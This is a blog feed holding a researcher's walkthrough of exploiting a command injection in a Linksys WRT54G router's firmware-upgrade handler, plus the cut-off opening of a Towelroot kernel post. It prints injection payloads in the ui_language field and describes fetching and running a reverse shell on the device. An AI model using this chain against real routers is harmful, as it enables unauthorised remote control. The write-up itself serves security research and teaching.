Jekyll2022-05-16T20:32:22+00:00https://elongl.github.io/feed.xmlElon GliksbergI like solving problems and taking on challenges.Pwning Home Router - Linksys WRT54G2021-05-30T00:00:00+00:002021-05-30T00:00:00+00:00https://elongl.github.io/exploitation/2021/05/30/pwning-home-router<p>Hebrew version is available on <a href="https://www.digitalwhisper.co.il/files/Zines/0x84/DW132-2-WRT54G_vuln.pdf">Digital Whisper</a>.</p>
<h1 id="preface">Preface</h1>
<p>A couple of days ago,
I was looking for a certain cable in one of my drawers where suddenly I stumbled upon a router that was laying around.
Immediately I wondered…<em>Could I hack it?</em></p>
<p><img src="https://i.imgur.com/sAmlLfJ.jpg" alt="Router Image" /></p>
<p style="text-align: center; font-style: italic"><small>"Easy setup" - Perhaps. "Secure"? Not so much.</small></p>
<p>It worked well for me because I was just looking for a new project to pick up on,
and I had no prior experience in tinkering with such devices and I thought it could be an interesting challenge.</p>
<h1 id="getting-started">Getting Started</h1>
<p>I connected the router to my computer and right away jumped onto the research.
I started off with a good ol’ port scan in order to get a good grasp of the router’s interfaces and my potential attack vectors.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜ ~ nmap <span class="nt">-F</span> 192.169.1.1
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-06-07 21:43 IDT
Nmap scan report <span class="k">for </span>192.169.1.1
Host is up <span class="o">(</span>0.0023s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 99 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>18.20 seconds
</code></pre></div></div>
<p>Unsurprisingly, looks like all we got to work with is the web server. Off we go then.</p>
<p>Browsing to the router’s website presents a login prompt,
to which I authenticate with the default credentials,
and shortly afterwards I’m introduced to the following control and management page.</p>
<p><img src="https://i.imgur.com/QJj9iOA.png" alt="Web Interface" /></p>
<p style="text-align: center; font-style: italic"><small>The router's web interface.</small></p>
<h1 id="hacking-time">Hacking Time</h1>
<p>Initially, I searched for potential inputs from the client when I came across the Diagnostics page.
<img src="https://i.imgur.com/QctdaYi.png" alt="Diagnostics Page" /></p>
<p>I thought it could be a good place to apply the oldest blackbox technique in the book - <em>Shell Injection</em>.
Unfortunately, client-side validation was applied.</p>
<center><video style="width: 480px; height: 495px; margin: 1rem" autoplay="" loop=""><source src="https://i.imgur.com/iM8isa8.mp4" /></video></center>
<p>In order to overcome it, I intercepted the request using a proxy.</p>
<center><video style="width: 750px; height: 500px; margin: 1rem" autoplay="" loop=""><source src="https://i.imgur.com/36pK23Z.mp4" /></video></center>
<p>Sadly, it seemed to have no effect at all on the ping request.<br />
Needless to say that I also attempted the same on the Traceroute Test interface and many other places but without any luck.</p>
<h1 id="getting-the-firmware">Getting The Firmware</h1>
<p>At this point I was done with doing Blackbox attack variations, mostly because I had no reason to.<br />
I decided to download <a href="https://www.linksys.com/us/support-article?articleNum=148648">the firmware</a>, extract the file system, and begin messing around with what’s available on the router.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜ linksys-wrt54g binwalk <span class="nt">-e</span> FW_WRT54Gv4_4.21.5.000_20120220.bin
DECIMAL HEXADECIMAL DESCRIPTION
<span class="nt">--------------------------------------------------------------------------------</span>
0 0x0 BIN-Header, board ID: W54G, hardware version: 4702, firmware version: 4.21.21, build <span class="nb">date</span>: 2012-02-08
32 0x20 TRX firmware header, little endian, image size: 3362816 bytes, CRC32: 0xE3ABE901, flags: 0x0, version: 1, header size: 28 bytes, loader offset: 0x1C, linux kernel offset: 0xAB0D4, rootfs offset: 0x0
60 0x3C <span class="nb">gzip </span>compressed data, maximum compression, has original file name: <span class="s2">"piggy"</span>, from Unix, last modified: 2012-02-08 03:40:02
700660 0xAB0F4 Squashfs filesystem, little endian, version 2.0, size: 2654572 bytes, 502 inodes, blocksize: 65536 bytes, created: 2012-02-08 03:43:28
➜ linksys-wrt54g <span class="nb">ls </span>_FW_WRT54Gv4_4.21.5.000_20120220.bin.extracted/squashfs-root
bin dev etc lib mnt proc sbin tmp usr var www
</code></pre></div></div>
<p>Intuitively, I started auditing the source code of the web application, because that’s what I could access directly as an attacker.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜ squashfs-root <span class="nb">ls </span>www
Backup_Restore.asp Fail.asp Forward.asp PortTriggerTable.asp SingleForward.asp Success_u_s.asp WEP.asp WanMAC.asp dyndns.asp image it_help tzo.asp
Cysaja.asp Fail_s.asp Forward.asp.bk.asp Port_Services.asp Status_Lan.asp SysInfo.htm WL_ActiveTable.asp Wireless_Advanced.asp en_help index.asp it_lang_pack wlaninfo.htm
DDNS.asp Fail_u_s.asp Log.asp QoS.asp Status_Router.asp SysInfo1.htm WL_FilterTable.asp Wireless_Basic.asp en_lang_pack index_heartbeat.asp sp_help
DHCPTable.asp FilterIPMAC.asp Log_incoming.asp Radius.asp Status_Router1.asp Traceroute.asp WL_WPATable.asp Wireless_MAC.asp fr_help index_l2tp.asp sp_lang_pack
DMZ.asp FilterSummary.asp Log_outgoing.asp RouteTable.asp Status_Wireless.asp Triggering.asp WPA.asp common.js fr_lang_pack index_pppoe.asp style.css
Diagnostics.asp Filters.asp Management.asp Routing.asp Success.asp Upgrade.asp WPA_Preshared.asp de_help google_redirect1.asp index_pptp.asp sw_help
Factory_Defaults.asp Firewall.asp Ping.asp SES_Status.asp Success_s.asp VPN.asp WPA_Radius.asp de_lang_pack google_redirect2.asp index_static.asp sw_lang_pack
</code></pre></div></div>
<p>Basically the web application is a bunch of <code class="language-plaintext highlighter-rouge">.asp</code> pages served through the <code class="language-plaintext highlighter-rouge">httpd</code> that is running.</p>
<p>First thing I did was inspect <code class="language-plaintext highlighter-rouge">Ping.asp</code> in order to see how the ping invocation is done since I wanted to know what failed my shell injection.
It took me a few minutes to realize that the web application isn’t the one that is doing the ping itself as I imagined it would with something like</p>
<div class="language-cs highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Process</span><span class="p">.</span><span class="nf">Start</span><span class="p">(</span><span class="s">"ping ..."</span><span class="p">);</span>
</code></pre></div></div>
<p>But rather what actually happens is that it passes on the request to the <code class="language-plaintext highlighter-rouge">httpd</code> which handles it.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>router-fs<span class="nv">$ </span><span class="nb">grep</span> <span class="nt">-r</span> apply.cgi
www/Wireless_Basic.asp:<FORM <span class="nv">name</span><span class="o">=</span>wireless <span class="nv">onSubmit</span><span class="o">=</span><span class="s2">"return false;"</span> <span class="nv">method</span><span class="o">=</span><% get_http_method<span class="o">()</span><span class="p">;</span> %> <span class="nv">action</span><span class="o">=</span>apply.cgi>
www/PortTriggerTable.asp:<FORM <span class="nv">name</span><span class="o">=</span>macfilter <span class="nv">method</span><span class="o">=</span><% get_http_method<span class="o">()</span><span class="p">;</span> %> <span class="nv">action</span><span class="o">=</span>apply.cgi>
www/Traceroute.asp:<FORM <span class="nv">name</span><span class="o">=</span>traceroute <span class="nv">method</span><span class="o">=</span><% get_http_method<span class="o">()</span><span class="p">;</span> %> <span class="nv">action</span><span class="o">=</span>apply.cgi>
www/WanMAC.asp:<FORM <span class="nv">name</span><span class="o">=</span>mac <span class="nv">method</span><span class="o">=</span><% get_http_method<span class="o">()</span><span class="p">;</span> %> <span class="nv">action</span><span class="o">=</span>apply.cgi>
www/DMZ.asp:<FORM <span class="nv">name</span><span class="o">=</span>dmz <span class="nv">method</span><span class="o">=</span><% get_http_method<span class="o">()</span><span class="p">;</span> %> <span class="nv">action</span><span class="o">=</span>apply.cgi>
www/Ping.asp:<FORM <span class="nv">name</span><span class="o">=</span>ping <span class="nv">method</span><span class="o">=</span><% get_http_method<span class="o">()</span><span class="p">;</span> %> <span class="nv">action</span><span class="o">=</span>apply.cgi>
...
Binary file usr/sbin/httpd matches
</code></pre></div></div>
<p>Consequently, when searching for <code class="language-plaintext highlighter-rouge">/apply.cgi</code> which is where all the HTTP requests are being sent to,
the only matches are from the web application with <code class="language-plaintext highlighter-rouge"><FORM></code> elements and the <code class="language-plaintext highlighter-rouge">httpd</code>.</p>
<p>Generally, the sole job of the web application is to pass parameters to the <code class="language-plaintext highlighter-rouge">httpd</code> which actually does the heavy lifting.
I now realized that sooner or later I’d have to reverse the HTTP daemon that is running on the router in order to see how it handles the requests.</p>
<h1 id="analyzing-http-daemon">Analyzing HTTP Daemon</h1>
<p>I opened up Ghidra, filtered the symbol tree to “ping” and found a function called <a href="https://gist.github.com/elongl/8b42ab42fe82c4a456f26a571dd5276d"><code class="language-plaintext highlighter-rouge">ping_server</code></a>.
<img src="https://i.imgur.com/DijAl9t.png" alt="Ghidra ping_server" /></p>
<p>Worth mentioning that none of the binaries that were present within the firmware had any debug symbols, and that they were stripped.</p>
<p>However, with great help of Ghidra’s decompiler, although a bit inaccurate, I concluded that what the function does is
eventually call a function named <code class="language-plaintext highlighter-rouge">_eval</code> like so.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">_eval</span><span class="p">(</span><span class="s">"ping -c {ping_times} {ping_ip}"</span><span class="p">)</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">ping_times</code> and <code class="language-plaintext highlighter-rouge">ping_ip</code> being the arguments that are supplied from the web page which can be seen above.</p>
<p>Naturally, I went on to see how <code class="language-plaintext highlighter-rouge">_eval</code> handles this input.
Accordingly, I had to figure out where the symbol is located since it’s an imported symbol that does not reside within <code class="language-plaintext highlighter-rouge">httpd</code> itself.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>router-fs<span class="nv">$ </span>readelf <span class="nt">-d</span> usr/sbin/httpd
Dynamic section at offset 0x120 contains 27 entries:
Tag Type Name/Value
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libnvram.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libshared.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libcrypto.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libssl.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libexpat.so]
0x00000001 <span class="o">(</span>NEEDED<span class="o">)</span> Shared library: <span class="o">[</span>libc.so.0]
...
router-fs<span class="nv">$ </span>nm <span class="nt">-gD</span> usr/lib/libnvram.so | <span class="nb">grep eval
</span>router-fs<span class="nv">$ </span>nm <span class="nt">-gD</span> usr/lib/libshared.so | <span class="nb">grep eval
</span>0000bd28 T _eval
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">_eval</code> is located within <code class="language-plaintext highlighter-rouge">libshared.so</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">_eval</code> <a href="https://gist.github.com/elongl/cf5badc6d78721cacbe87dfe59afeef5">function itself</a> is relatively long,
but the important part is that it forks and then uses <code class="language-plaintext highlighter-rouge">execvp</code> as opposed to <code class="language-plaintext highlighter-rouge">system</code>.
Therefore, a shell injection is not possible because the constant <code class="language-plaintext highlighter-rouge">"ping"</code> is the program that will be launched <em>regardless</em> of my other arguments.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">_eval</span><span class="p">(</span><span class="kt">char</span> <span class="o">**</span><span class="n">param_1</span><span class="p">,</span><span class="kt">char</span> <span class="o">*</span><span class="n">param_2</span><span class="p">,</span><span class="n">uint</span> <span class="n">param_3</span><span class="p">,</span><span class="n">__pid_t</span> <span class="o">*</span><span class="n">param_4</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">__pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
<span class="p">...</span>
<span class="n">setenv</span><span class="p">(</span><span class="s">"PATH"</span><span class="p">,</span><span class="s">"/sbin:/bin:/usr/sbin:/usr/bin"</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<span class="n">alarm</span><span class="p">(</span><span class="n">param_3</span><span class="p">);</span>
<span class="n">execvp</span><span class="p">(</span><span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="n">param_1</span><span class="p">);</span>
<span class="n">perror</span><span class="p">(</span><span class="o">*</span><span class="n">param_1</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>I tried to see if I could escalate my control via <code class="language-plaintext highlighter-rouge">ping</code> or <code class="language-plaintext highlighter-rouge">traceroute</code> with certain arguments but I didn’t find anything interesting.
I also searched for other references within <code class="language-plaintext highlighter-rouge">httpd</code> to <code class="language-plaintext highlighter-rouge">_eval</code> in the hope that I’d find a place in which the first argument, the program, is user-controlled.<br />
As expected, I couldn’t find such a scenario.</p>
<h1 id="back-to-basics">Back To Basics</h1>
<p>Well, why not at least <em>try</em> to think simpler than that?<br />
Let’s begin by searching for references for <code class="language-plaintext highlighter-rouge">system</code> within <code class="language-plaintext highlighter-rouge">httpd</code>.
<img src="https://i.imgur.com/usejiO7.png" alt="system xrefs" />
There weren’t too many in the first place, and all of them were actually safe since an attacker couldn’t meddle in between.</p>
<p>With the exception of a <a href="https://gist.github.com/elongl/e9974c91efcec1a0dc04fc9b639b861d">single</a> spot 😮</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">do_upgrade_post</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">param_1</span><span class="p">,</span><span class="n">BIO</span> <span class="o">*</span><span class="n">param_2</span><span class="p">,</span><span class="kt">int</span> <span class="n">param_3</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">system</span><span class="p">(</span><span class="s">"cp /www/Success_u_s.asp /tmp/."</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="s">"cp /www/Fail_u_s.asp /tmp/."</span><span class="p">);</span>
<span class="n">memset</span><span class="p">(</span><span class="n">acStack88</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mh">0x40</span><span class="p">);</span>
<span class="n">puVar1</span> <span class="o">=</span> <span class="p">(</span><span class="n">undefined</span> <span class="o">*</span><span class="p">)</span><span class="n">nvram_get</span><span class="p">(</span><span class="s">"ui_language"</span><span class="p">);</span>
<span class="n">uVar7</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">puVar1</span> <span class="o">==</span> <span class="p">(</span><span class="n">undefined</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">puVar1</span> <span class="o">=</span> <span class="o">&</span><span class="n">DAT_0047a2b8</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">acStack88</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="s">"cp /www/%s_lang_pack/captmp.js /tmp/."</span><span class="p">,</span><span class="n">puVar1</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="n">acStack88</span><span class="p">);</span>
<span class="n">iVar2</span> <span class="o">=</span> <span class="n">memcmp</span><span class="p">(</span><span class="n">param_1</span><span class="p">,</span><span class="s">"restore.cgi"</span><span class="p">,</span><span class="mh">0xb</span><span class="p">);</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>You can see that what happens is that a variable called <code class="language-plaintext highlighter-rouge">puVar1</code> is formatted into a <code class="language-plaintext highlighter-rouge">cp</code> command using <code class="language-plaintext highlighter-rouge">snprintf</code>,
and then the command is invoked with <code class="language-plaintext highlighter-rouge">system</code>.</p>
<p>The variable <code class="language-plaintext highlighter-rouge">puVar1</code> is loaded from <code class="language-plaintext highlighter-rouge">nvram_get("ui_language")</code>. NVRAM stands for <em>Non-Volatile RAM</em> which is data that “survives” a reboot,
in this case, the language of the user interface since we don’t want it to change whenever the router restarts.</p>
<p>Luckily for us, we can control this value!</p>
<p><img src="https://i.imgur.com/xrNitIn.png" alt="change ui_language" /></p>
<p>I looked for the place from which you can change the language on the web page,
and I inspected the request that was being sent and I noted that in fact the <code class="language-plaintext highlighter-rouge">ui_language</code> parameter is being changed,
in my case from <code class="language-plaintext highlighter-rouge">"en"</code> to <code class="language-plaintext highlighter-rouge">"fr"</code>.</p>
<p>Seems like all we have to do is change <code class="language-plaintext highlighter-rouge">ui_language</code> to <code class="language-plaintext highlighter-rouge">;{malicious command};</code> in order to get code execution.
Let’s give it a shot with <code class="language-plaintext highlighter-rouge">;reboot;</code>.</p>
<center><video style="width: 750px; height: 500px; margin: 1rem" autoplay="" loop=""><source src="https://i.imgur.com/RbcqA2t.mp4" /></video></center>
<p>Well, while corrupted, a web page returned and therefore we can deduce that the device and the web server are still functional,
and didn’t experience any reboot.</p>
<p>At first I thought that maybe I have insufficient permissions to reboot the device but I highly doubted it given it’s a router,
or that <code class="language-plaintext highlighter-rouge">reboot</code> is not in the <code class="language-plaintext highlighter-rouge">$PATH</code>,
so I tried pinging myself with absolute path in order to confront both of those issues <code class="language-plaintext highlighter-rouge">/bin/ping 192.169.1.100</code>.
Still, no luck.</p>
<p>Currently, I revisited the vulnerability with a deeper inspection.<br />
If you paid close attention you noticed that the vulnerable function’s name is <code class="language-plaintext highlighter-rouge">do_upgrade_post</code>.<br />
This must mean that I have to <strong>issue an upgrade</strong> in order to trigger the bug!</p>
<p>A few things I had to do beforehand:</p>
<ol>
<li>
<p>Because changing the <code class="language-plaintext highlighter-rouge">ui_language</code> to an invalid option corrupts the web page,
I opened up the firmware update page in advance and I’m only switching tabs after changing the language.</p>
</li>
<li>
<p>I also needed to encode the command so that it could be properly used within a URL</p>
</li>
</ol>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">urllib</span><span class="p">.</span><span class="n">parse</span><span class="p">.</span><span class="n">quote</span><span class="p">(</span><span class="s">';ping -c 4 192.169.1.100;'</span><span class="p">)</span>
<span class="o">-></span> <span class="s">'%3Bping%20-c%204%20192.169.1.100%3B'</span>
</code></pre></div></div>
<ol>
<li>Create an empty file named <code class="language-plaintext highlighter-rouge">*.bin</code> in order to pass the firmware filename client-side validation.</li>
</ol>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/-N307W7cd9Y" frameborder="0" allowfullscreen=""></iframe></center>
<p>Yes! We got code execution.</p>
<p>I can only assume that the developers didn’t think this was susceptible to shell injection since the way
in which you change a language is via a dropdown and you can’t provide free-text on the interface.</p>
<h1 id="interactive-shell">Interactive Shell</h1>
<p>Although executing commands on the router is great, I still lack an interactive shell which is my true goal.</p>
<p>In order to cope with that, I needed to upload a reverse shell onto the router.<br />
Though, how could I upload files?
Originally, I thought of uploading the file with a command like</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="o">{</span>revshell_bytes<span class="o">}</span> <span class="o">></span> revshell
</code></pre></div></div>
<p>Though, I then recalled that I couldn’t do so due to the size limitation on <code class="language-plaintext highlighter-rouge">snprintf</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Copies up to 0x40 bytes.</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">acStack88</span><span class="p">,</span><span class="mh">0x40</span><span class="p">,</span><span class="s">"cp /www/%s_lang_pack/captmp.js /tmp/."</span><span class="p">,</span><span class="n">puVar1</span><span class="p">);</span>
<span class="n">system</span><span class="p">(</span><span class="n">acStack88</span><span class="p">);</span>
</code></pre></div></div>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">:</span> <span class="mh">0x40</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="s">'cp /www/'</span><span class="p">)</span>
<span class="n">Out</span><span class="p">:</span> <span class="mi">56</span> <span class="p">(</span><span class="mh">0x38</span><span class="p">)</span>
</code></pre></div></div>
<p>I’m limited to 56 characters, two of which are the <code class="language-plaintext highlighter-rouge">;</code> at the beginning and at the end, so essentially 54 characters.
Uploading it by chunks with <code class="language-plaintext highlighter-rouge">echo {chunk} >> revshell</code> would take a very long time and I didn’t want to go down that path.</p>
<p>At this point in time, I realized that <code class="language-plaintext highlighter-rouge">wget</code> is present on the device!<br />
I compiled a <a href="https://github.com/elongl/linksys-wrt54g/blob/master/revshell/revshell.c">reverse shell</a> and set up an HTTP server so that I can pull it to the router.</p>
<p>I automated the process of changing the <code class="language-plaintext highlighter-rouge">ui_language</code> to a command in conjunction with issuing a firmware update in order to execute a shell command.
If everything works correctly, the firmware update request should block since it’s now executing the reverse shell (given that it doesn’t fork).</p>
<p>Steps:</p>
<ol>
<li>Upload the reverse shell using <code class="language-plaintext highlighter-rouge">wget</code>.</li>
<li>Make it executable using <code class="language-plaintext highlighter-rouge">chmod +x</code>.</li>
<li>Running it.</li>
</ol>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/wmvKFE1XFXw" frameborder="0" allowfullscreen=""></iframe></center>
<p>We can tell that the router attempted to download the binary from our HTTP server since we received the request.
Sadly, it is clear that after I issue the last firmware upgrade which should invoke the reverse shell, it returns immediately.
More so, we can see that a shell doesn’t open up on our handler.</p>
<p>For the sake of assessing whether the file was uploaded successfully, I used the AND (<code class="language-plaintext highlighter-rouge">&&</code>) operator.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat</span> /tmp/X <span class="o">&&</span> ping <span class="nt">-c</span> 1 192.169.1.100
</code></pre></div></div>
<p>If the file was present, I would receive an ICMP packet on my end, else, I wouldn’t.</p>
<p><img src="https://i.imgur.com/gVYDd0U.png" alt="Check Revshell Existence" /></p>
<p>But I did.</p>
<p>Well, what is it then? Why wouldn’t it work?</p>
<p>I wanted to be able to get the output from the shell commands that I’m running in order to ease on the debugging process.
I thought of a couple of ways to do it:</p>
<ol>
<li>Upload a malicious ASP page, <em>Web Shell</em> if you will, and execute commands with the output returned.</li>
<li>Look for files that are displayed within the web interface and write my output to them.</li>
<li>Set myself as the router’s DNS server and force the router to issue DNS requests with the command output included.
For instance, <code class="language-plaintext highlighter-rouge">nslookup $(echo hello).fake.domain</code>, and then I’d receive a DNS Query request of <code class="language-plaintext highlighter-rouge">hello.fake.domain</code>.
However this method is less preferred because extracting the data programmatically from the DNS requests could be quite tedious.</li>
</ol>
<p>I started off with the attempt to upload a web shell onto the <code class="language-plaintext highlighter-rouge">www</code> directory.
When I browsed to it, the web server replied with <code class="language-plaintext highlighter-rouge">404 Not Found</code>. I inferred that the web server corresponds to predefined constant paths like <code class="language-plaintext highlighter-rouge">/Ping.asp</code>,
and that it doesn’t simply lookup the files within <code class="language-plaintext highlighter-rouge">www</code>.</p>
<p>Having that in mind, I attempted to overwrite an existing page,
hoping I’ll now receive my own crafted page. I was surprised to see that it still served me the original one.
It seems that the server caches the pages in memory when <code class="language-plaintext highlighter-rouge">httpd</code> starts, and doesn’t reload the pages until a reboot occurs.</p>
<p>I then recalled the ping interface.<br />
The output was the exact output of the <code class="language-plaintext highlighter-rouge">ping</code> command.
I bet that it writes it to a file and that the web server reads from that file.</p>
<p>I opened my disassembler and looked for strings that contain a <code class="language-plaintext highlighter-rouge">/</code> indicating a file path, and <code class="language-plaintext highlighter-rouge">ping</code>.
<img src="https://i.imgur.com/znqjVnI.png" alt="Ping Log Ghidra" />
That’s it! <code class="language-plaintext highlighter-rouge">/tmp/ping.log</code> must be the one. Let’s test it.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="n">r</span> <span class="o">=</span> <span class="n">Router</span><span class="p">(</span><span class="s">'192.169.1.1'</span><span class="p">,</span> <span class="p">(</span><span class="s">'admin'</span><span class="p">,</span> <span class="s">'waddup'</span><span class="p">))</span>
<span class="n">In</span> <span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="n">r</span><span class="p">.</span><span class="n">_run_shell_cmd</span><span class="p">(</span><span class="s">'ps'</span><span class="p">,</span> <span class="n">with_output</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Running</span><span class="p">:</span> <span class="p">;</span><span class="n">ps</span><span class="o">>/</span><span class="n">tmp</span><span class="o">/</span><span class="n">ping</span><span class="p">.</span><span class="n">log</span> <span class="mi">2</span><span class="o">>&</span><span class="mi">1</span><span class="p">;</span>
<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Issuing</span> <span class="n">a</span> <span class="n">firmware</span> <span class="n">upgrade</span><span class="p">.</span>
</code></pre></div></div>
<p><img src="https://i.imgur.com/1cdJgez.png" alt="Ping Log Output" /></p>
<p>Awesome! We can now see the output of our commands.<br />
We can even see ourselves with PID 540 🙃</p>
<p>Next thing I did was run <code class="language-plaintext highlighter-rouge">ls /tmp</code> to ensure the reverse shell is in fact there and is executable,<br />
which it was.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>drwxr-xr-x 1 0 0 0 Jan 1 2000 var
lrwxrwxrwx 1 0 0 8 Jan 1 00:00 ldhclnt -> /sbin/rc
drwx------ 1 0 0 0 Jan 1 00:00 cron.d
-rw-r--r-- 1 0 0 8 Jan 1 01:22 action
-rw-r--r-- 1 0 0 36 Jan 1 00:00 crontab
-rw-r--r-- 1 0 0 88 Jan 1 02:33 udhcpd.leases
-rw-r--r-- 1 0 0 287 Jan 1 00:00 udhcpd.conf
-rw-r--r-- 1 0 0 40 Jan 1 00:00 nas.lan.conf
-rw-r--r-- 1 0 0 27 Jan 1 00:00 ses.log
lrwxrwxrwx 1 0 0 8 Jan 1 00:00 udhcpc -> /sbin/rc
-rw-r--r-- 1 0 0 33 Jan 1 00:00 nas.wan.conf
-rw-r--r-- 1 0 0 1 Jan 1 00:00 udhcpc.expires
-rw-r--r-- 1 0 0 1.7k Jan 1 00:00 .ipt
-rw-r--r-- 1 0 0 20 Jan 1 00:00 .out_rule
-rw-r--r-- 1 0 0 3.0k Jan 1 02:33 Success_u_s.asp
-rw-r--r-- 1 0 0 1.5k Jan 1 02:33 Fail_u_s.asp
-rwxr-xr-x 1 0 0 0 Jan 1 00:09 X
-rw-r--r-- 1 0 0 0 Jan 1 01:22 ping.log
drwxr-xr-x 1 503 503 76 Feb 8 2012 ..
drwxr-xr-x 1 0 0 0 Jan 1 2000 .
</code></pre></div></div>
<p>I tried running it and I received <code class="language-plaintext highlighter-rouge">SIGSEGV</code> on my ping log.
Seems to be that I failed to compile the reverse shell correctly to the target.</p>
<h1 id="compiling">Compiling</h1>
<p>It’s crucial for me to state that I wanted to be able to compile and run my <strong>own program</strong>.<br />
That is why I did not attempt beforehand to deploy a reverse shell using <code class="language-plaintext highlighter-rouge">bash</code>, <code class="language-plaintext highlighter-rouge">nc</code>, <code class="language-plaintext highlighter-rouge">python</code>, <code class="language-plaintext highlighter-rouge">perl</code>, etc.
Though, even if I wanted to, none of those were available on the system.</p>
<p>Throughout the process I learned that MIPS, which is the architecture that the router runs, has a lot of different variations,
and that compiling a program to run on the device turned out to be a bigger challenge than I expected.</p>
<p>When I approached to compile <code class="language-plaintext highlighter-rouge">revshell.c</code>,
I thought that all I’d have to do is install <code class="language-plaintext highlighter-rouge">gcc</code> for MIPS so I just did <code class="language-plaintext highlighter-rouge">mips-linux-gnu-gcc -static revshell.c -o revshell</code> but boy was I wrong.
I tried passing various arguments to the compiler, and using different compilers, but none of which seemed to run successfully on the router.
I also tried just assembling native MIPS code with <code class="language-plaintext highlighter-rouge">as</code>.</p>
<p>Eventually I came to know that the vendor publishes a <a href="https://www.linksys.com/us/support-article?articleNum=114663">toolchain</a> which contains a bunch of tools that are relevant for the device,
amongst them is the compiler that is used to build the programs for the target.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>/opt/brcm/hndtools-mipsel-linux/bin/mipsel-linux-gcc <span class="nt">-s</span> <span class="nt">-static</span> revshell.c <span class="nt">-o</span> revshell
<span class="nv">$ </span>file revshell
revshell: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, <span class="k">for </span>GNU/Linux 2.2.15, stripped
</code></pre></div></div>
<p>Let’s experiment and see if this toolchain is any good.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/P015AjNWvW8" frameborder="0" allowfullscreen=""></iframe></center>
<p>Mission accomplished! Full interactive shell.<br />
The repository of the exploit is available <a href="https://github.com/elongl/linksys-wrt54g">here</a>.</p>
<p>Thank you for reading.</p>Hebrew version is available on Digital Whisper.Exploiting CVE-2014-3153 (Towelroot)2021-01-08T00:00:00+00:002021-01-08T00:00:00+00:00https://elongl.github.io/exploitation/2021/01/08/cve-2014-3153<h1 id="understanding-the-kernel">Understanding The Kernel</h1>
<p>For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.<br />
I didn’t like how the most basic and fundamental level of a computer was so abstract to me,<br />
and that I did not <em>truly</em> grasp how some of it works, a “black-box”.</p>
<p>I’ve always been more than familiar with kernel and OS concepts,<br />
but there’s a big gap from comprehending them as a user versus a kernel hacker.<br />
<strong>I wanted to see code, not words.</strong></p>
<p>In order to tackle that,
